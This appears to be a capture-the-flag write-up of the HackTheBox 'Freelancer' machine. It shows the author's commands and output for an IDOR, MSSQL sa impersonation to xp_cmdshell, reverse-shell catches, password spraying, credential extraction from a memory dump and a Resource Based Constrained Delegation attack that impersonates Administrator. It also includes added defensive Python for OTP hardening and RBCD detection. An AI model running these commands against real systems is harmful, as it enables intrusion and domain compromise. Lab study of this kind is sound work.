Freelancer is a hard-difficulty Windows machine on HackTheBox. It starts with exploiting an IDOR vulnerability to get admin access on the dashboard, followed by abusing user impersonation on the MSSQL server to gain command execution through xp_cmdshell. Later, we analyze a Windows datacenter memory dump with MemProcFS to obtain another user's credentials and abuse Resource Based Constrained Delegation.
PS C:\Users\0xkujen> nmap -A -Pn 10.129.9.24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-20 19:27 W. Central Africa Standard Time
NSOCK ERROR [0.3230s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.10% done; ETC: 19:27 (0:00:00 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 3.20% done; ETC: 19:27 (0:00:00 remaining)
Nmap scan report for 10.129.9.24
Host is up (0.11s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-20T23:30:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   173.00 ms 10.10.16.1
2   67.00 ms  10.129.9.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.03 seconds
We can see that port 80 is redirecting us to http://freelancer.htb/, so let’s add that entry to our /etc/hosts file.
We can see that this is a simple web app with login and registration features. We can register ourselves either as a Freelancer or as an Employer.
Employer Account Registration
At first, the app tells us our account won't be active upon creation.
And indeed, when we try to log in, authentication fails.
Taking a look at the Forgot Password feature, I try to reset my password, entering my details first (I thought of this after exhausting all other thoughts and trials to access the dashboard).
Then we are asked to change our password.
After changing my password and trying to log in again, I don't get the authentication error and I'm in.
QR Code Manipulation
One feature that intrigued me was the QR code one.
Scanning the provided QR code, I get this URL: http://freelancer.htb/accounts/login/otp/MTAwMTA=/1d3b89a43cc2ba9d0fd838ad1ef4dcea/ One thing I noticed is that “MTAwMTA=” looked like a base64-encoded string; decoding it gives me the number “10010”, which looks like a user id. I honestly was too lazy to create another user and validate it to check whether the user id theory was correct, so I just assumed it was, haha.
Therefore I tried different user ids to try and reach an admin account. The base64 value for id “1” gives me an Internal Server Error 500, whereas the base64 value for id “2” returns this message:
But I was doing it really slowly, so let's redo it more quickly, which gets us admin access:
(PS: the base64 value for the id “2” is Mgo= - it’s the only value that worked for me)
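To make the IDOR concrete from the application side, here is an added example (my own code, not the Freelancer app's) that decodes the id segment the way the writeup did, reproduces the shape of the vulnerable link, and shows a hardened variant in which the id is bound to the token with an HMAC so that editing the id segment no longer authenticates another account. The key, the URL layout of the hardened link and the helper names are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import secrets

# Constructed demo key; a real app loads it from configuration, never from source.
SERVER_KEY = b"constructed-demo-key-not-a-real-secret"

def decode_user_id(segment):
    """Decode the id segment of the OTP URL, e.g. 'MTAwMTA=' -> '10010'.
    'Mgo=' decodes to '2\\n' (trailing newline, as from `echo 2 | base64`), hence strip()."""
    return base64.b64decode(segment).decode().strip()

def weak_otp_link(user_id, otp_hash):
    """Shape of the vulnerable link: the id is plain base64 and the hash is not bound
    to it, so editing the id segment makes the server act on a different account."""
    uid = base64.b64encode(str(user_id).encode()).decode()
    return f"/accounts/login/otp/{uid}/{otp_hash}/"

def issue_token(user_id):
    """Hardened variant: random nonce plus an HMAC over (user_id, nonce). The server
    should additionally store the nonce as single-use with an expiry (not shown)."""
    nonce = secrets.token_hex(16)
    tag = hmac.new(SERVER_KEY, f"{user_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return nonce, tag

def verify_token(user_id, nonce, tag):
    """Recompute the MAC for the id that is actually in the URL; a swapped id,
    a swapped nonce or an edited tag all fail the constant-time comparison."""
    expected = hmac.new(SERVER_KEY, f"{user_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)

def hardened_otp_link(user_id):
    """Assumed layout: /accounts/login/otp/<b64 id>/<nonce>/<tag>/"""
    nonce, tag = issue_token(user_id)
    uid = base64.urlsafe_b64encode(str(user_id).encode()).decode()
    return f"/accounts/login/otp/{uid}/{nonce}/{tag}/"

def verify_link(path):
    """Parse a hardened link and return the user id it authenticates, or None."""
    parts = path.strip("/").split("/")
    if len(parts) != 6:
        return None
    try:
        user_id = int(base64.urlsafe_b64decode(parts[3]).decode())
    except ValueError:  # covers binascii.Error and UnicodeDecodeError too
        return None
    return user_id if verify_token(user_id, parts[4], parts[5]) else None
```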
Seeing that we are on a Windows box, I immediately thought of MSSQL as the database management service. One thing I can do is try to enable xp_cmdshell on MSSQL to execute commands:
MSSQL Abuse
But we can see it failed due to lack of permissions. I then immediately thought of this HackTricks article, where we try to impersonate the sysadmin user:
select user_name(); -- to determine the user name to add the role to, which is Freelancer_webapp_user
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
SELECT IS_SRVROLEMEMBER('sysadmin')
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.160.22] 55468
Windows PowerShell running as user sql_svc on DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
As usual, I'll be looking for hidden database credentials. Looking at the MSSQL server configuration, I stumbled upon the sql-Configuration.INI file, which contains a password:
The password is IL0v3ErenY3ager. I'll check the C:\users folder to collect usernames for enumeration:
PS C:\users> ls

    Directory: C:\users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         10/4/2024  10:57 PM                Administrator
d-----         5/28/2024  10:23 AM                lkazanof
d-----         5/28/2024  10:23 AM                lorra199
d-----         5/28/2024  10:22 AM                mikasaAckerman
d-----         8/27/2023   1:16 AM                MSSQLSERVER
d-r---         5/28/2024   2:13 PM                Public
d-----         5/28/2024  10:22 AM                sqlbackupoperator
d-----         5/28/2024  11:16 AM                sql_svc

PS C:\users>
Running the usernames and the password through crackmapexec, I find a valid match for the mikasaAckerman user:
┌──(kali㉿kali)-[~/hackthebox/freelancer]
└─$ crackmapexec smb freelancer.htb -u users.txt -p IL0v3ErenY3ager --continue-on-success
SMB  10.129.9.24  445  DC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB  10.129.9.24  445  DC  [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
SMB  10.129.9.24  445  DC  [-] freelancer.htb\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB  10.129.9.24  445  DC  [-] freelancer.htb\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB  10.129.9.24  445  DC  [-] freelancer.htb\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB  10.129.9.24  445  DC  [-] freelancer.htb\:IL0v3ErenY3ager STATUS_LOGON_FAILURE
I can use RunasCs to run commands as this user, impersonating him, and so get a shell:
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-3ea25$\Default
[+] Async process 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4880 created in background.
PS C:\users\sql_svc\downloads>
And we get our shell:
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.160.22] 61400
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
On mikasaAckerman's desktop, we can also see two interesting files, one of which is mail.txt:
PS C:\users\mikasaackerman\desktop> cat mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019. I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart. Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
PS C:\users\mikasaackerman\desktop>
Reading the mail, we can conclude that the other file, MEMORY.7z, is a memory dump of the Datacenter machine. I will transfer the file over to my station and have a look at it. For this I will be using this script to base64-encode the file and then transfer it over to my machine:
As the MEMORY.7z file is a datacenter memory dump, at first I thought of using Volatility to analyze it (as I love that tool). But after some more research I stumbled onto the MemProcFS tool, which mounts the dump as a virtual file system. MemProcFS has many features and plugins, one of which is mimikatz, which gave me the SAM hive contents, including the lorra user's password:
┌──(kali㉿kali)-[~/Downloads]
└─$ bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -dc dc.freelancer.htb -ns 10.129.160.22 --zip
INFO: Found AD domain: freelancer.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 8 computers
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 30 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SetupMachine.freelancer.htb
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: Datacenter-2019
INFO: Querying computer: DC.freelancer.htb
WARNING: Could not resolve: Datacenter-2019: The DNS operation timed out after 3.1036694049835205 seconds
INFO: Done in 00M 16S
INFO: Compressing output into 20241005120853_bloodhound.zip
Now let's also check whether we can connect to the system as lorra:
┌──(kali㉿kali)-[~/Downloads]
└─$ evil-winrm -i 10.129.160.22 -u lorra199 -p 'PWN3D#l0rr@Armessa199'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\lorra199\Documents> whoami
freelancer\lorra199
*Evil-WinRM* PS C:\Users\lorra199\Documents>
Resource Based Constrained Delegation
Importing that data into BloodHound, we can see that lorra199 is a member of the AD Recycle Bin group and has generic rights on the domain controller object itself:
Now I'm going to abuse RBCD (Resource Based Constrained Delegation) by adding a fake computer that I control to the domain. Then, using lorra199's rights over the DC object, I allow that computer to act on behalf of other identities on the DC, which lets it request Kerberos tickets impersonating other accounts, like Administrator:
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKER$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ATTACKER$   (S-1-5-21-3542429192-2036945976-3483670807-12101)
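A defender looking for this change reads msDS-AllowedToActOnBehalfOfOtherIdentity on each computer object; the value is a binary security descriptor whose DACL lists the accounts allowed to act on behalf of others against that computer. The following added example (my own code, not from the writeup or from impacket) parses that descriptor with the standard library only and lists the granted SIDs. The descriptor it parses is constructed in-block and carries the ATTACKER$ SID from the output above; the 0xF01FF mask is a sample value the parser does not inspect.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00   # ACE type that grants the right
SE_DACL_PRESENT = 0x0004         # security descriptor control bit
SE_SELF_RELATIVE = 0x8000        # offsets in the header are relative to its start

def build_sid(sid_str):
    """Encode 'S-1-5-21-...' into the binary SID layout (used to build the sample)."""
    parts = sid_str.split("-")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def parse_sid(buf, off):
    """Decode a binary SID at offset `off` back into its string form."""
    rev, count = struct.unpack_from("<BB", buf, off)
    ident = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, ident, "-".join(str(s) for s in subs))

def build_rbcd_sd(sids):
    """Constructed self-relative security descriptor with one ACCESS_ALLOWED ACE per
    SID, the layout AD stores in msDS-AllowedToActOnBehalfOfOtherIdentity."""
    aces = b""
    for s in sids:
        sid = build_sid(s)
        # ACE header: type, flags, size; then the access mask; then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), 0xF01FF) + sid
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    # SD header: revision, sbz1, control, owner/group/sacl/dacl offsets; DACL follows the 20-byte header
    return struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20) + dacl

def allowed_to_act(sd):
    """Return the SIDs of every ACCESS_ALLOWED ACE in the descriptor's DACL: the
    accounts permitted to act on behalf of users against this computer."""
    _, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, out = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append(parse_sid(sd, off + 8))
        off += ace_size
    return out
```

Any SID returned that is not an expected delegation account is worth an alert; a non-empty value on a domain controller object is rarely legitimate.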
I also synced my clock with the DC to avoid Kerberos clock-skew issues:
┌──(kali㉿kali)-[~/impacket/examples]
└─$ sudo ntpdate -u 10.129.160.22
2024-10-05 12:22:39.952632 (-0400) +99.756066 +/- 0.022332 10.129.160.22 s1 no-leap
CLOCK: time stepped by 99.756066
Then I request a Kerberos service ticket for the CIFS service on the DC. Using this ticket, I can impersonate a specific user (Administrator, hehe):
┌──(kali㉿kali)-[~/impacket/examples]
└─$ impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.129.160.22 'freelancer.htb/ATTACKER$:Kujen2024!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@[email protected]
I can now run secretsdump against the DC to obtain all users' hashes, thereby rooting the machine: